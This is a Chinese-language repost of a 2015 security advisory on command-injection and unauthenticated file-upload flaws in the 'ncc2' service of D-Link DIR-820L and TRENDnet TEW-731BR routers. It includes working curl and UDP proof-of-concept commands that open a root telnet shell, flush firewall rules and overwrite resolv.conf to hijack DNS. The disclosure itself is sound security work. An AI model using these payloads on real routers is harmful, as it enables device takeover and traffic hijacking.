记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

D-Link 和TRENDnet 'ncc2' 服务多个漏洞 附POC

2015-02-28 00:45

分享到:

t0131f59777997767d3.jpg

Author: Peter Adkins <peter.adkins@kernelpicnic.net>

影响版本:

  • D-Link DIR-820L      (Rev A) - v1.02B10

  • D-Link DIR-820L      (Rev A) - v1.05B03

  • D-Link DIR-820L      (Rev B) - v2.01b02

  • TRENDnet TEW-731BR      (Rev 2) - v2.01b01

可能影响版本:

  • D-Link DIR-808L      (Rev A) - v1.03b05

  • D-Link DIR-810L      (Rev A) - v1.01b04

  • D-Link DIR-810L      (Rev B) - v2.02b01

  • D-Link DIR-826L      (Rev A) - v1.00b23

  • D-Link DIR-830L      (Rev A) - v1.00b07

  • D-Link DIR-836L      (Rev A) - v1.01b03

Notes

利用ping.ccp的漏洞,攻击者仅仅通过让用户访问一个恶意网页就能获取设备的root权限,劫持DNS,执行命令等。

Ncc/ncc2的漏洞也可能存在于以上的其他设备、其他固件版本中。

D-Link一般对于安全问题一周内便会有回复,但我在提交了漏洞细节一个月后也没有收到来自D-Link任何形式的反馈。

这些漏洞可能被远程利用,但需要设备开启远程管理功能。

如果你有别的设备也受这些漏洞影响,可以联系我更新本文。

fwupgrade.ccp

ncc/ncc2服务提供的升级语言文件和固件的接口,并以root权限运行,但没有对文件名做有效的过滤,致使可以在无需认证的情况下上传甚至覆盖文件,如覆盖resolv.conf文件,造成DNS劫持。

POC:

echo 'nameserver 8.8.8.8' > resolv.conf
curl \
 -i http://192.168.0.1/fwupgrade.ccp \
 -F action=fwupgrade \
 -F filename=resolv.conf \
 -F file=@resolv.conf

ping.ccp

 ncc/ncc2服务提供的网络诊断功能,其中ping_ipv6未对参数做有效过滤可操作命令执行,可通过CSRF,劫持DNS,篡改防火墙策略等。

POC:

# Spawn a root shell (telnet)
curl \
 -i http://192.168.0.1/ping.ccp \
 --data 'ccp_act=ping_v6&ping_addr=$(telnetd -l /bin/sh)'
# Flush the iptables INPUT chain and set the default policy to ACCEPT.
curl \
 -i http://192.168.0.1/ping.ccp \
 --data 'ccp_act=ping_v6&ping_addr=$(iptables -P INPUT ACCEPT)'
curl \
 -i http://192.168.0.1/ping.ccp \
 --data 'ccp_act=ping_v6&ping_addr=$(iptables -F INPUT)'

UDPServer / MP Daemon

Ncc/ncc2服务提供了一系列的诊断功能,可能被攻击者利用。其中一个诊断功能(test_mode.txt)会开启一个UDPServer进程,该进程监听9034端口,并将接受到的数据不经过滤就传递给了system系统调用,可造成命令注入。

POC:

# Spawn a root shell (telnet)
curl -i 192.168.0.1/test_mode.txt
echo "\`telnetd -l /bin/sh\`" > /dev/udp/192.168.0.1/9034

Diagnostic hooks

除了上述的’test_mode’外,ncc/ncc2还提供了以下诊断接口:

  • tftpd_ready.txt

  • chklst.txt

  • wps_default_pin.txt

  • usb_connect.txt

  • wps_btn.txt

  • reset_btn.txt

  • reboot_btn.txt

  • calibration_ready24G.txt

  • calibration_ready5G.txt

  • restore_default_finish.txt

  • set_mac_finish.txt

  • test_mode.txt

  • wifist.txt

相关详细分析请参见原文。

本文由 360安全播报 翻译,转载请注明“转自360安全播报”,并附上链接。
原文链接:https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2

知识来源: bobao.360.cn/learning/detail/263.html

阅读:71058 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“D-Link 和TRENDnet 'ncc2' 服务多个漏洞 附POC”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词